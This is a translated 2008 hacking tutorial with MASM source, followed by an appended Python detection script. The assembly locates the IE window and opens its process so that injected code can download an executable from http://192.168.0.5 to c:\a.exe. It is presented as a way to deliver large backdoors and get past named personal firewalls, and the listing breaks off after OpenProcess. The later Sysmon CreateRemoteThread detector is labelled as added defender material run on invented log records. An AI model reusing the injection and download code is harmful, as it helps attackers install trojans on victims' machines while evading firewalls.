Injecting download code into the IE process and then executing the downloaded file
  Add date: 07/23/2008   Publishing date: 07/23/2008
(Page 1 of 2)
 

Most people use a web-page trojan to fetch the real EXE trojan, but when the backdoor is fairly large the download often makes the page hang or throw an error (CHM trojans run into this a lot).
So I wrote this program.


Build parameters (assemble with ml, link with link):
C:\masm32\BIN >type ii.bat
ml /c /coff i.asm
link /subsystem:windows i.obj

I just tested it: it gets past the Skynet (天网) firewall's restriction on applications accessing the network, and Kingsoft NetGuard (金山网镖) is certainly no problem either.


; #----------------------------------------------#
; # Inject download code into IE -->             #
; # --> it can also get past a personal firewall #
; # 2004.07.15                                   #
; # codz: czy                                    #
; #----------------------------------------------#

; test on win2k server sp4 masm8  

.386  
.model flat, stdcall  
option casemap:none  

include ../include/user32.inc  
includelib ../lib/user32.lib  
include ../include/kernel32.inc  
includelib ../lib/kernel32.lib  
include ../include/windows.inc  


.data  
hello db 'under 2K constructs the long-distance thread ', 0  
tit db 'IEFrame',0  
szFormat db 'PID is: %d',0  
szBuffer dd 20 dup(0),0  
pid dd 0  
hProcess dd 0  
hThread dd 0  
pCodeRemote dd 0  
path1 db 'c:\a.EXE ', 0 

.const 
szmsg db 'URLDownloadToFileA',0 
userdll db 'Urlmon.dll',0 
; szmsg db 'MessageBoxA',0 
; userdll db 'User32.dll',0 
szloadlib db 'LoadLibraryA',0; note: the ANSI version, not LoadLibraryW
kerdll db 'kernel32.dll',0 

.code 
codebegin: 
dispdata db 'http://192.168.0.5/NBTreeList.exe', 0
szTit db 'c:\a.exe', 0
datalen =$-codebegin 
Rproc proc msgbox; the address of the API to call (URLDownloadToFileA here, MessageBoxA in the commented-out variant) is passed as the thread parameter
CALL @F; the call pushes the return address, i.e. the runtime address of @@
@@: 
POP EBX 
SUB EBX, OFFSET @B 
LEA ECX,[EBX+dispdata] 
LEA EDX,[EBX+szTit] 
push NULL 
push 0 
push edx 
push ecx 
push NULL 
call msgbox 
ret; important: the remote thread must return cleanly
Rproc endp 
codelen =$-codebegin; total length of the block to copy, in bytes

start: 
; invoke FindWindow,0, offset tit; returns the window handle (original calculator test)
invoke FindWindow, offset tit,0; find the IE main window by its class name
invoke GetWindowThreadProcessId, eax, offset pid; get the PID of the process that owns the window
; invoke wsprintf, offset szBuffer, offset szFormat, pid; show the PID in decimal
invoke OpenProcess, PROCESS_ALL_ACCESS, FALSE, pid; open the process and obtain a handle to it
mov hProcess, eax; save the process handle
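The technique above (open a trusted browser process, copy a small position-independent block into it and start a thread on it so the download is attributed to IE) leaves a characteristic trace: a thread created in another process whose start address is not inside any loaded module. The following detection script is an added example written from the defender's side; it is not part of the original tutorial. It parses flat "Key=Value" records modelled on Sysmon Event ID 8 (CreateRemoteThread, with its real field names SourceImage, TargetImage, StartAddress, StartModule, StartFunction) and flags cross-process thread creation into a browser or into memory that no module backs. The log lines themselves are constructed for this example, not captured from a real system.

```python
import re
from typing import Dict, List

# Processes a personal firewall typically trusts for outbound connections.
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "msedge.exe"}

# Constructed sample records in a flat "Key=Value Key=Value" layout.
# Field names follow Sysmon's Event ID 8 schema; every value is invented.
SAMPLE_LOG = r"""
EventID=8 SourceImage=C:\tools\i.exe TargetImage=C:\Program Files\Internet Explorer\iexplore.exe StartAddress=0x00410000 StartModule= StartFunction=
EventID=8 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\svchost.exe StartAddress=0x77E0A0B4 StartModule=C:\Windows\System32\kernel32.dll StartFunction=LoadLibraryA
EventID=8 SourceImage=C:\Windows\System32\csrss.exe TargetImage=C:\Windows\explorer.exe StartAddress=0x7C810000 StartModule=C:\Windows\System32\kernel32.dll StartFunction=
EventID=1 Image=C:\Windows\notepad.exe CommandLine=notepad.exe
"""

# A value runs until the next " Key=" token, so paths containing spaces survive.
_FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line: str) -> Dict[str, str]:
    """Split one flat record into a dict; empty values (StartModule=) are kept as ''."""
    return {key: value.strip() for key, value in _FIELD_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: Dict[str, str]) -> List[str]:
    """Return the indicators that make one CreateRemoteThread event suspicious.

    Cross-process thread creation alone is common (debuggers, some installers),
    so an alert needs at least one further indicator on top of it.
    """
    if event.get("EventID") != "8":
        return []
    src = event.get("SourceImage", "")
    dst = event.get("TargetImage", "")
    if src.lower() == dst.lower():
        return []  # same image creating threads in itself: ignore here
    reasons = ["cross-process thread creation"]
    if basename(dst) in BROWSERS:
        reasons.append("target is a browser (firewall-trusted process)")
    if not event.get("StartModule"):
        reasons.append("thread start address not backed by a loaded module")
    if event.get("StartFunction", "").startswith("LoadLibrary"):
        reasons.append("thread entry is LoadLibrary (DLL injection pattern)")
    return reasons if len(reasons) > 1 else []


def detect_remote_thread_injection(log_text: str) -> List[Dict[str, object]]:
    """Scan a block of records and return one alert per suspicious event."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_event(line)
        reasons = assess(event)
        if reasons:
            alerts.append({
                "source": event["SourceImage"],
                "target": event["TargetImage"],
                "start": event.get("StartAddress", ""),
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_remote_thread_injection(SAMPLE_LOG):
        print(f"{alert['source']} -> {alert['target']} @ {alert['start']}")
        for reason in alert["reasons"]:
            print(f"    - {reason}")
```

On the constructed input only the first record fires: an unsigned-looking loader creating a thread in iexplore.exe at an address outside any module, which is exactly the footprint the assembly above produces. The svchost record is skipped as same-image, and the csrss-to-explorer record has a module-backed start and no other indicator, so it stays below the alert threshold.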

 
